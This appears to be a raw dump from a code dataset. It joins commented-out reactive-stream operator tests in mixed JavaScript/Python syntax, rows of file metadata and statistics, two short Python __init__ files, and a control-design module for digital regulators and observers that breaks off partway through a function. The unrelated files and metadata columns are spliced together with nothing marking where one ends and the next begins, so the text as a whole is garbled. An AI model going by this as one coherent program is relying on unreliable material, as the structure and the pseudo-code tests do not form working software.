# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
# res = scheduler.start(create)
# return xs.takeWithTime(25, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(225))
# xs.subscriptions.assert_equal(subscribe(200, 225))
# def test_Take_Late():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeWithTime(50, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_Take_Error():
# var ex, res, scheduler, xs
# scheduler = TestScheduler()
# ex = 'ex'
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.takeWithTime(50, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_Take_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.takeWithTime(50, scheduler)
# res.messages.assert_equal(on_completed(250))
# xs.subscriptions.assert_equal(subscribe(200, 250))
# def test_Take_Twice1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.takeWithTime(55, scheduler).takeWithTime(35, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(235))
# xs.subscriptions.assert_equal(subscribe(200, 235))
# def test_Take_Twice2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.takeWithTime(35, scheduler).takeWithTime(55, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(235))
# xs.subscriptions.assert_equal(subscribe(200, 235))
# // Skip
# def test_Skip_Zero():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipWithTime(0, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_Skip_Some():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipWithTime(15, scheduler)
# res.messages.assert_equal(on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_Skip_Late():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipWithTime(50, scheduler)
# res.messages.assert_equal(on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_Skip_Error():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.skipWithTime(50, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_Skip_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.skipWithTime(50, scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# def test_Skip_Twice1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.skipWithTime(15, scheduler).skipWithTime(30, scheduler)
# res.messages.assert_equal(on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# xs.subscriptions.assert_equal(subscribe(200, 270))
# def test_Skip_Twice2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.skipWithTime(30, scheduler).skipWithTime(15, scheduler)
# res.messages.assert_equal(on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# xs.subscriptions.assert_equal(subscribe(200, 270))
# // TakeLast
# def test_TakeLast_Zero1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(0, scheduler)
# res.messages.assert_equal(on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_Zero1_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(0, scheduler, scheduler)
# res.messages.assert_equal(on_completed(231))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_Zero2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(0, scheduler)
# res.messages.assert_equal(on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_Zero2_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(0, scheduler, scheduler)
# res.messages.assert_equal(on_completed(231))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_Some1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler)
# res.messages.assert_equal(on_next(240, 2), on_next(240, 3), on_completed(240))
# xs.subscriptions.assert_equal(subscribe(200, 240))
# def test_TakeLast_Some1_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler, scheduler)
# res.messages.assert_equal(on_next(241, 2), on_next(242, 3), on_completed(243))
# xs.subscriptions.assert_equal(subscribe(200, 240))
# def test_TakeLast_Some2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler)
# res.messages.assert_equal(on_completed(300))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_TakeLast_Some2_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler, scheduler)
# res.messages.assert_equal(on_completed(301))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_TakeLast_Some3():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_next(270, 7), on_next(280, 8), on_next(290, 9), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastWithTime(45, scheduler)
# res.messages.assert_equal(on_next(300, 6), on_next(300, 7), on_next(300, 8), on_next(300, 9), on_completed(300))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_TakeLast_Some3_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_next(270, 7), on_next(280, 8), on_next(290, 9), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastWithTime(45, scheduler, scheduler)
# res.messages.assert_equal(on_next(301, 6), on_next(302, 7), on_next(303, 8), on_next(304, 9), on_completed(305))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_TakeLast_Some4():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(240, 2), on_next(250, 3), on_next(280, 4), on_next(290, 5), on_next(300, 6), on_completed(350))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler)
# res.messages.assert_equal(on_completed(350))
# xs.subscriptions.assert_equal(subscribe(200, 350))
# def test_TakeLast_Some4_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(240, 2), on_next(250, 3), on_next(280, 4), on_next(290, 5), on_next(300, 6), on_completed(350))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler, scheduler)
# res.messages.assert_equal(on_completed(351))
# xs.subscriptions.assert_equal(subscribe(200, 350))
# def test_TakeLast_All():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler)
# res.messages.assert_equal(on_next(230, 1), on_next(230, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_All_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler, scheduler)
# res.messages.assert_equal(on_next(231, 1), on_next(232, 2), on_completed(233))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_Error():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_TakeLast_Error_WithLoopScheduler():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_TakeLast_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# def test_TakeLast_Never_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler, scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# // Skiplast
# def test_SkipLast_Zero1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipLastWithTime(0, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipLast_Zero2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# res = scheduler.start(create)
# return xs.skipLastWithTime(0, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipLast_Some1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# res = scheduler.start(create)
# return xs.skipLastWithTime(15, scheduler)
# res.messages.assert_equal(on_next(230, 1), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipLast_Some2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_next(270, 7), on_next(280, 8), on_next(290, 9), on_completed(300))
# res = scheduler.start(create)
# return xs.skipLastWithTime(45, scheduler)
# res.messages.assert_equal(on_next(260, 1), on_next(270, 2), on_next(280, 3), on_next(290, 4), on_next(300, 5), on_completed(300))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_SkipLast_All():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipLastWithTime(45, scheduler)
# res.messages.assert_equal(on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipLast_Error():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.skipLastWithTime(45, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_SkipLast_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.skipLastWithTime(50, scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# // SkipUntil
# def test_SkipUntil_Zero():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(0), scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipUntil_Late():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal(on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipUntil_Error():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_SkipUntil_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# def test_SkipUntil_Twice1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(215), scheduler).skipUntilWithTime(Date(230), scheduler)
# res.messages.assert_equal(on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# xs.subscriptions.assert_equal(subscribe(200, 270))
# def test_SkipUntil_Twice2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(230), scheduler).skipUntilWithTime(Date(215), scheduler)
# res.messages.assert_equal(on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# xs.subscriptions.assert_equal(subscribe(200, 270))
# // TakeUntil
# def test_TakeUntil_Zero():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(0), scheduler)
# res.messages.assert_equal(on_completed(201))
# xs.subscriptions.assert_equal(subscribe(200, 201))
# def test_TakeUntil_Late():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeUntil_Error():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_TakeUntil_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal(on_completed(250))
# xs.subscriptions.assert_equal(subscribe(200, 250))
# def test_TakeUntil_Twice1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(255), scheduler).takeUntilWithTime(Date(235), scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(235))
# xs.subscriptions.assert_equal(subscribe(200, 235))
# def test_TakeUntil_Twice2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(235), scheduler).takeUntilWithTime(Date(255), scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(235))
# xs.subscriptions.assert_equal(subscribe(200, 235))
# Script entry point: runs a single test function directly, without a
# test runner.
if __name__ == '__main__':
    # The commented-out calls below are alternative tests; uncomment one
    # (and comment the active call) to run it in isolation.
    #test_delay_timespan_simple1()
    #test_delay_datetime_offset_simple1_impl()
    #test_window_time_basic()
    #test_timeout_timeout_not_occurs_error()
    test_buffer_with_time_or_count_basic()
| 41.870396
| 530
| 0.675879
| 12,653
| 89,812
| 4.572591
| 0.025053
| 0.105882
| 0.071348
| 0.094111
| 0.929706
| 0.913701
| 0.901153
| 0.891145
| 0.873792
| 0.861089
| 0
| 0.093279
| 0.18473
| 89,812
| 2,144
| 531
| 41.889925
| 0.69689
| 0.310426
| 0
| 0.716165
| 0
| 0
| 0.008373
| 0
| 0
| 0
| 0
| 0
| 0.208647
| 1
| 0.221805
| false
| 0.005639
| 0.004699
| 0.092105
| 0.361842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
79f4bc129bbe93b0fc1dab34b8fc789af3ba4b5d
| 113
|
py
|
Python
|
sb3_contrib/iqn/_init_.py
|
aniruddha123reinforcement/stable-baselines3-contrib
|
45d00c8657ed75ef9f6efc14a415ff6e56734fc7
|
[
"MIT"
] | null | null | null |
sb3_contrib/iqn/_init_.py
|
aniruddha123reinforcement/stable-baselines3-contrib
|
45d00c8657ed75ef9f6efc14a415ff6e56734fc7
|
[
"MIT"
] | null | null | null |
sb3_contrib/iqn/_init_.py
|
aniruddha123reinforcement/stable-baselines3-contrib
|
45d00c8657ed75ef9f6efc14a415ff6e56734fc7
|
[
"MIT"
] | null | null | null |
from sb3_contrib.iqn.policies import CnnPolicy, MlpPolicy, MultiInputPolicy
from sb3_contrib.iqn.iqn import IQN
| 37.666667
| 75
| 0.849558
| 16
| 113
| 5.875
| 0.5625
| 0.148936
| 0.297872
| 0.361702
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0.097345
| 113
| 2
| 76
| 56.5
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
03276b9019d3f5d7dd1aaebb9b63ce3347a5f5d2
| 89
|
py
|
Python
|
fmkr/__init__.py
|
cgohlke/fmkr
|
41398aef2a79f3780b06de66d4d87428271b3343
|
[
"BSD-3-Clause"
] | 1
|
2020-02-23T20:18:03.000Z
|
2020-02-23T20:18:03.000Z
|
fmkr/__init__.py
|
cgohlke/fmkr
|
41398aef2a79f3780b06de66d4d87428271b3343
|
[
"BSD-3-Clause"
] | null | null | null |
fmkr/__init__.py
|
cgohlke/fmkr
|
41398aef2a79f3780b06de66d4d87428271b3343
|
[
"BSD-3-Clause"
] | null | null | null |
# fmkr/__init__.py
from .fmkr import __doc__, __all__, __version__
from .fmkr import *
| 14.833333
| 47
| 0.752809
| 12
| 89
| 4.25
| 0.666667
| 0.313725
| 0.54902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157303
| 89
| 5
| 48
| 17.8
| 0.68
| 0.179775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0332dfa131e387b3fb4157a229e295c86db5ec6f
| 21,619
|
py
|
Python
|
control_design.py
|
tderensis/digital_control
|
2ab6c67815e79396520aab351573fe0b82131e29
|
[
"MIT"
] | null | null | null |
control_design.py
|
tderensis/digital_control
|
2ab6c67815e79396520aab351573fe0b82131e29
|
[
"MIT"
] | null | null | null |
control_design.py
|
tderensis/digital_control
|
2ab6c67815e79396520aab351573fe0b82131e29
|
[
"MIT"
] | null | null | null |
"""
Functions that construct stable closed loop control systems. Many of the
methods here are adapted from Digital Control: A State-Space Approach and
accompanying courses at URI.
Requires numpy, scipy, control
"""
from __future__ import print_function
import control_poles
import control
import numpy as np
from numpy import linalg as LA
from scipy import signal
import cmath
def find_candadate_spoles(sys, desired_settling_time, disp=True):
    """ Find candidate closed-loop s-plane poles for a continuous plant.

    Plant poles that are already sufficiently damped are kept, complex
    poles that are too slow are given added damping, unstable poles are
    reflected about the imaginary axis, and anything else is discarded.

    Args:
        sys (StateSpace): The continuous plant model.
        desired_settling_time: The desired settling time in seconds.
        disp: Print debugging output. Default is True.

    Returns:
        list: Candidate s-plane poles. May contain fewer entries than the
        plant has states; callers pad the remainder with Bessel poles.
    """
    spoles = []
    (sys_spoles, vectors) = LA.eig(sys.A)
    if disp:
        print("system poles:")
        print(*sys_spoles, sep="\n")
    # first go through the system poles and see if they are suitable.
    # s1 is the dominant (first-order) Bessel pole normalized to the
    # desired settling time; it sets the damping threshold below.
    s1_normalized = control_poles.bessel_spoles(1, desired_settling_time)[0]
    if disp:
        print("s1 normalized to", desired_settling_time, "s = ", s1_normalized)
    for pole in sys_spoles:
        if pole.real < s1_normalized.real:
            # Use sufficiently damped plant poles: plant poles whose real
            # parts lie to the left of s1/Ts.
            spoles.append(pole)
            if disp:
                print("Using sufficiently damped plant pole", pole)
        elif pole.imag != 0 and pole.real > s1_normalized.real and pole.real < 0:
            # Replace real part of a complex pole that is not sufficiently
            # damped with s1/Ts
            pole = complex(s1_normalized.real, pole.imag)
            spoles.append(pole)
            if disp:
                print("Using added damping pole", pole)
        elif pole.real > 0 and -pole.real < s1_normalized.real:
            # Reflect the pole about the imaginary axis and use that
            pole = complex(-pole.real, pole.imag)
            spoles.append(pole)
            if disp:
                print("Using pole reflection", pole)
        else:
            if disp:
                print("Pole not suitable", pole)
    return spoles
def design_regsf(sys_c_ol, sampling_interval, desired_settling_time, spoles=None, disp=True):
    """ Design a digital full state feedback regulator with the desired settling time.
    Args:
        sys_c_ol (StateSpace): The continuous plant model
        sampling_interval: The sampling interval for the digital control system in seconds.
        desired_settling_time: The desired settling time in seconds
        spoles (optional): The desired closed loop poles. If not supplied, then optimal
            poles will try to be used. Default is None.
        disp: Print debugging output. Default is True.
    Returns:
        tuple: (sys_d_ol, L) Where sys_d_ol is the discrete plant and L is the stablizing
            gain matrix. None is returned on any design failure.
    """
    # Make sure the system is in fact continuous and not discrete
    # (continuous StateSpace systems have dt of None).
    if sys_c_ol.dt is not None:
        print("Error: Function expects continuous plant")
        return None
    A = sys_c_ol.A
    B = sys_c_ol.B
    C = sys_c_ol.C
    D = sys_c_ol.D
    num_states = A.shape[0]
    num_inputs = B.shape[1]
    num_outputs = C.shape[0]
    # Convert to discrete system using zero order hold method
    sys_d_ol = sys_c_ol.to_discrete(sampling_interval, method="zoh")
    phi = sys_d_ol.A
    gamma = sys_d_ol.B
    # Check controlability of the discrete system
    controllability_mat = control.ctrb(phi, gamma)
    rank = LA.matrix_rank(controllability_mat)
    if rank != num_states:
        print("Error: System is not controlable")
        return None
    # Check observability of the discrete system
    observability_mat = control.obsv(phi, C)
    rank = LA.matrix_rank(observability_mat)
    if rank != num_states:
        print("Error: System is not observable")
        return None
    # Choose poles if none were given
    if spoles is None:
        spoles = find_candadate_spoles(sys_c_ol, desired_settling_time, disp)
        num_spoles_left = num_states - len(spoles)
        if num_spoles_left > 0:
            # Use normalized bessel poles for the rest
            spoles.extend(control_poles.bessel_spoles(num_spoles_left, desired_settling_time))
    zpoles = control_poles.spoles_to_zpoles(spoles, sampling_interval)
    if disp:
        print("spoles = ", spoles)
        print("zpoles = ", zpoles)
    # place the poles such that eig(phi - gamma*L) are inside the unit circle
    full_state_feedback = signal.place_poles(phi, gamma, zpoles)
    # Check the poles for stability just in case. A pole ON the unit
    # circle is only marginally stable, so reject it too (>= 1, matching
    # the check in design_regob).
    for zpole in full_state_feedback.computed_poles:
        if abs(zpole) >= 1:
            print("Computed pole is not stable")
            return None
    L = full_state_feedback.gain_matrix
    return (sys_d_ol, np.matrix(L))
def design_regob(sys_c_ol, sampling_interval, desired_settling_time,
                 desired_observer_settling_time=None, spoles=None, sopoles=None,
                 disp=True):
    """ Design a digital full order observer regulator with the desired settling time.
    Args:
        sys_c_ol (StateSpace): The continuous plant model
        sampling_interval: The sampling interval for the digital control system in seconds.
        desired_settling_time: The desired settling time in seconds
        desired_observer_settling_time (optional): The desired observer settling time
            in seconds. If not provided the observer settling time will be 4 times faster
            than the overall settling time. Default is None.
        spoles (optional): The desired closed loop poles. If not supplied, then optimal
            poles will try to be used. Default is None.
        sopoles (optional): The desired observer poles. If not supplied, then optimal
            poles will try to be used. Default is None.
        disp: Print debugging output. Default is True.
    Returns:
        tuple: (sys_d_ol, L, K) Where sys_d_ol is the discrete plant, L is the stablizing
            gain matrix, and K is the observer gain matrix. None is returned on any
            design failure.
    """
    # Make sure the system is in fact continuous and not discrete
    # (continuous StateSpace systems have dt of None).
    if sys_c_ol.dt is not None:
        print("Error: Function expects continuous plant")
        return None
    A = sys_c_ol.A
    B = sys_c_ol.B
    C = sys_c_ol.C
    D = sys_c_ol.D
    num_states = A.shape[0]
    num_inputs = B.shape[1]
    num_outputs = C.shape[0]
    # Convert to discrete system using zero order hold method
    sys_d_ol = sys_c_ol.to_discrete(sampling_interval, method="zoh")
    phi = sys_d_ol.A
    gamma = sys_d_ol.B
    # Check controlability of the discrete system
    controllability_mat = control.ctrb(phi, gamma)
    rank = LA.matrix_rank(controllability_mat)
    if rank != num_states:
        print(rank, num_states)
        print("Error: System is not controlable")
        return None
    # Check observability of the discrete system
    observability_mat = control.obsv(phi, C)
    rank = LA.matrix_rank(observability_mat)
    if rank != num_states:
        print("Error: System is not observable")
        return None
    # Choose poles if none were given
    if spoles is None:
        spoles = find_candadate_spoles(sys_c_ol, desired_settling_time, disp)
        num_spoles_left = num_states - len(spoles)
        if num_spoles_left > 0:
            # Use normalized bessel poles for the rest
            spoles.extend(control_poles.bessel_spoles(num_spoles_left, desired_settling_time))
    zpoles = control_poles.spoles_to_zpoles(spoles, sampling_interval)
    if disp:
        print("spoles = ", spoles)
        print("zpoles = ", zpoles)
